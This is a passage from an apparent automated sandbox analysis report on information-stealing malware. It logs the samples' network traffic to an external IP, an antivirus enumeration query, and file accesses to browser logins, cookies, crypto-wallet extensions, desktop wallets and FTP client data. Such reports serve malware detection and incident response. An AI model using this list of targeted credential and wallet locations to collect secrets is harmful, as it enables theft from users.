X@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,8_2_00405BFC
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Source: Yara matchFile source: 2.2.skotes.exe.b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.skotes.exe.b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.random.exe_Y.exe.a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.skotes.exe.b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000002.2211661900.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000003.2171173391.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.2142098174.00000000049E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2212616596.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000003.2506817597.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000003.2172004233.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: Yara matchFile source: 00000025.00000002.2838016524.0000000003200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000003.2813486090.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000025.00000003.2817891813.00000000009D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000003.2818001314.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: global trafficTCP traffic: 192.168.2.6:49919 -> 185.185.71.170:80
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDB
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDB
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPS
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPS
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents
